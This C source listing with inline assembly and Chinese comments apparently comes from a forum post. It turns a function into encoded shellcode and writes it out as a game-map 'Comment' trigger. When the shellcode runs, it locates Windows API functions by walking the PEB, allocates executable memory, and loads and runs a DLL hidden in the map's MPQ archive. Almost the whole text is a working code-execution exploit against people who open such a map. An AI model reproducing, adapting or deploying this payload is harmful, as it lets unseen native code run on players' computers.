|
- #include <stdio.h>
- #include <windows.h>
- #include "mmsystem.h"
- #define PINT int *
- #define FASTCALL __fastcall
- #pragma pack(1)
- typedef struct
- {
- DWORD Unused0;
- DWORD Text;//1
- DWORD Code;//2
- DWORD Unused2;//
- DWORD Address;
- DWORD Value;
- USHORT Operator;
- } *ActionParams;
- typedef void *HANDLE;
- const FARPROC (WINAPI**sc_GetProcAddress) ( HMODULE hModule, LPCSTR lpProcName ) = (const FARPROC(WINAPI**)(HMODULE,LPCSTR))0x4ED160;
- char* (FASTCALL*GetResString)(USHORT index) = (char*(FASTCALL*)(USHORT))0x448880;
- DWORD (WINAPI**sc_LoadLibrary)(LPCSTR) = (DWORD(WINAPI**)(LPCSTR))(0x4ED15C);
- void (WINAPI**sc_FreeLibrary)(DWORD) = (void(WINAPI**)(DWORD))(0x4ED138);
- BOOL (WINAPI**sc_VirtualProtect)(DWORD, DWORD, DWORD, DWORD *) = (BOOL(WINAPI**)(DWORD, DWORD, DWORD, DWORD *))0x5D171358;
- //void * (WINAPI**sc_VirtualAlloc)(void *, SIZE_T, DWORD, DWORD) = (void *(WINAPI**)(void *, SIZE_T, DWORD, DWORD))0x004ED127;
- FILE *(*sc_fopen)(LPCSTR,LPCSTR)=(FILE *(*)(LPCSTR,LPCSTR))(0x77C0F010/*0x7C02AE09*/);
- int(*sc_fwrite)(void*,DWORD,DWORD,FILE*)=(int(*)(void*,DWORD,DWORD,FILE*))(0x77C1173B/*0x7C02CF72*/);
- int(*sc_fclose)(FILE*)=(int(*)(FILE*))(0x77C10AB1/*0x7C01441F*/);
- void *(*sc_malloc)(DWORD)=(void *(*)(DWORD))(0x77BFC407);
- void (*sc_free)(void *)=(void (*)(void *))(0x77BFC21B);
- BOOL(WINAPI**sc_SFileOpenArchive)(char *archivename, DWORD dwPriority, DWORD dwFlags, HANDLE *handle)=(BOOL(WINAPI**)(char *archivename, DWORD dwPriority, DWORD dwFlags, HANDLE *handle))0x4ED2BC;
- BOOL(WINAPI**sc_SFileOpenFile)(char *filename, HANDLE *handle) = (BOOL(WINAPI**)(char *filename, HANDLE *handle))0x4ED364;
- BOOL(WINAPI**sc_SFileCloseFile)(HANDLE hFile) = (BOOL(WINAPI**)(HANDLE hFile))0x4ED360;
- BOOL(WINAPI**sc_SFileCloseArchive)(HANDLE hArchive) = (BOOL(WINAPI**)(HANDLE hArchive))0x4ED2C0;
- long(WINAPI**sc_SFileGetFileSize)(HANDLE hFile, LPDWORD lpFileSizeHigh) = (long(WINAPI**)(HANDLE hFile, LPDWORD lpFileSizeHigh))0x4ED358;
- BOOL(WINAPI**sc_SFileOpenFileEx)(HANDLE handle, char *filename, char mode, HANDLE *result) =(BOOL(WINAPI**)(HANDLE handle, char *filename, char mode, HANDLE *result))0x4ED368;
- BOOL(WINAPI**sc_SFileReadFile)(HANDLE hFile, void *buffer, DWORD nNumberOfBytesToRead, DWORD*, DWORD) = (BOOL(WINAPI**)(HANDLE hFile, void *buffer, DWORD nNumberOfBytesToRead, DWORD*, DWORD))0x4ED354;
- MMRESULT(WINAPI*sc_midiStreamOpen)(LPHMIDISTRM phms, LPUINT puDeviceID, DWORD cMidi, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen) = (MMRESULT(WINAPI*)(LPHMIDISTRM phms, LPUINT puDeviceID, DWORD cMidi, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen))0x76B29F78;
- MMRESULT(WINAPI*sc_midiStreamClose)(HMIDISTRM hms)=(MMRESULT(WINAPI*)(HMIDISTRM hms))0x76B2A2AB;
- MMRESULT(WINAPI*sc_midiOutPrepareHeader)(HMIDIOUT hmo, LPMIDIHDR pmh, UINT cbmh)=(MMRESULT(WINAPI*)(HMIDIOUT hmo, LPMIDIHDR pmh, UINT cbmh))0x76B28DC5;
- MMRESULT(WINAPI*sc_midiStreamOut)(HMIDISTRM hms, LPMIDIHDR pmh, UINT cbmh)=(MMRESULT(WINAPI*)(HMIDISTRM hms, LPMIDIHDR pmh, UINT cbmh))0x76B2A4EE;
- MMRESULT(WINAPI*sc_midiOutOpen)(LPHMIDIOUT phmo,UINT uDeviceID,DWORD_PTR dwCallback,DWORD_PTR dwInstance, DWORD fdwOpen)=(MMRESULT(WINAPI*)(LPHMIDIOUT phmo,UINT uDeviceID,DWORD_PTR dwCallback,DWORD_PTR dwInstance, DWORD fdwOpen))0x76B28B74;
- MMRESULT(WINAPI*sc_midiOutGetID)(HMIDIOUT hmo, LPUINT puDeviceID)=(MMRESULT(WINAPI*)(HMIDIOUT hmo, LPUINT puDeviceID))0x76B29CBB;
- BOOL FASTCALL Comment(ActionParams params)
- {
- HMODULE (*MemLoadLibrary)(void *, DWORD, DWORD, DWORD, DWORD);
- HANDLE mpq,file1,file2;
- void *dll;
- DWORD siz1,siz2;
- DWORD MEM = 5064013;
- DWORD WB = 25207;
- if(!(*sc_SFileOpenArchive)((char*)0x509364, 0, 0, &mpq)) return false;
- if(!(*sc_SFileOpenFileEx)(mpq, (char*)&MEM, 0, &file1)) return false;
- if(!(*sc_SFileOpenFileEx)(mpq, (char*)&WB, 0, &file2)) return false;
- siz1=(*sc_SFileGetFileSize)(file1, 0);
- siz2=(*sc_SFileGetFileSize)(file2, 0);
- void * (WINAPI*sc_VirtualAlloc)(DWORD, DWORD, DWORD, DWORD);
- DWORD GetProcAddress1;
- DWORD LoadLibraryA1;
- DWORD IsBadReadPtr1;
- _asm{
- call $+5+13;//13是下面的_EMIT 指令的数量,也就是包括\0在内的字符串长度
- _EMIT 'V';//这里写入API函数的名字。
- _EMIT 'i'
- _EMIT 'r'
- _EMIT 't'
- _EMIT 'u'
- _EMIT 'a'
- _EMIT 'l'
- _EMIT 'A'
- _EMIT 'l'
- _EMIT 'l'
- _EMIT 'o'
- _EMIT 'c'
- _EMIT '\0';//空结束符是必不可少的。
- mov eax,fs:30h;
- mov eax,[eax+0Ch];
- mov esi,[eax+1Ch];
- lodsd;
- push [eax+8];
- call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量,否则会编译出错。
- mov sc_VirtualAlloc,eax;
-
- call $+5+15;//13是下面的_EMIT 指令的数量,也就是包括\0在内的字符串长度
- _EMIT 'G';//这里写入API函数的名字。
- _EMIT 'e'
- _EMIT 't'
- _EMIT 'P'
- _EMIT 'r'
- _EMIT 'o'
- _EMIT 'c'
- _EMIT 'A'
- _EMIT 'd'
- _EMIT 'd'
- _EMIT 'r'
- _EMIT 'e'
- _EMIT 's'
- _EMIT 's'
- _EMIT '\0';//空结束符是必不可少的。
- mov eax,fs:30h;
- mov eax,[eax+0Ch];
- mov esi,[eax+1Ch];
- lodsd;
- push [eax+8];
- call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量,否则会编译出错。
- mov GetProcAddress1,eax;
-
- call $+5+13;//13是下面的_EMIT 指令的数量,也就是包括\0在内的字符串长度
- _EMIT 'L';//这里写入API函数的名字。
- _EMIT 'o'
- _EMIT 'a'
- _EMIT 'd'
- _EMIT 'L'
- _EMIT 'i'
- _EMIT 'b'
- _EMIT 'r'
- _EMIT 'a'
- _EMIT 'r'
- _EMIT 'y'
- _EMIT 'A'
- _EMIT '\0';//空结束符是必不可少的。
- mov eax,fs:30h;
- mov eax,[eax+0Ch];
- mov esi,[eax+1Ch];
- lodsd;
- push [eax+8];
- call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量,否则会编译出错。
- mov LoadLibraryA1,eax;
-
- call $+5+13;//13是下面的_EMIT 指令的数量,也就是包括\0在内的字符串长度
- _EMIT 'I';//这里写入API函数的名字。
- _EMIT 's'
- _EMIT 'B'
- _EMIT 'a'
- _EMIT 'd'
- _EMIT 'R'
- _EMIT 'e'
- _EMIT 'a'
- _EMIT 'd'
- _EMIT 'P'
- _EMIT 't'
- _EMIT 'r'
- _EMIT '\0';//空结束符是必不可少的。
- mov eax,fs:30h;
- mov eax,[eax+0Ch];
- mov esi,[eax+1Ch];
- lodsd;
- push [eax+8];
- call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量,否则会编译出错。
- mov IsBadReadPtr1,eax;
- }
- (void*&)MemLoadLibrary = (HMODULE)sc_VirtualAlloc(NULL, siz1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- dll = sc_VirtualAlloc(NULL, siz2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- (*sc_SFileReadFile)(file1, (void*&)MemLoadLibrary, siz1, &siz1, 0);
- (*sc_SFileReadFile)(file2, dll, siz2, &siz2, 0);
- (*sc_SFileCloseFile)(file1);
- (*sc_SFileCloseFile)(file2);
- (*sc_SFileCloseArchive)(mpq);
- MemLoadLibrary(dll,(DWORD)sc_VirtualAlloc,GetProcAddress1,LoadLibraryA1,IsBadReadPtr1);
- return true;
- }
- void AfterFunction(){}
- LPCSTR Base64Enc(int size = 0)
- {
- if (size <= 0)
- size = PtrToLong((PBYTE)AfterFunction - (PBYTE)Comment);
- PBYTE text = (PBYTE)Comment;
- PBYTE out = new BYTE[(size - 1) * 4 / 3 + 1],buf = out;
- int buflen = 0;
- while(size>0)
- {
- *buf++ = ((text[0] >> 2 ) & 0x3f) + 0x30;
- *buf++ = (((text[0] & 3) << 4) | (text[1] >> 4)) + 0x30;
- *buf++ = (((text[1] & 0xF) << 2) | (text[2] >> 6)) + 0x30;
- *buf++ = (text[2] & 0x3F) + 0x30;
- text +=3;
- size -=3;
- buflen +=4;
- }
- *buf = 0;
- return (LPCSTR)out;
- }
- int main(int argc, CHAR* argv[])
- {
- malloc(1);
- FILE *f1=fopen("d:\\desktop\\comment.txt","wb");
- fprintf(f1,"Comment(\"%s\", 0, 0, 17, 0, 1);\n",Base64Enc());
- fclose(f1);
- int i;
- }
复制代码 |
|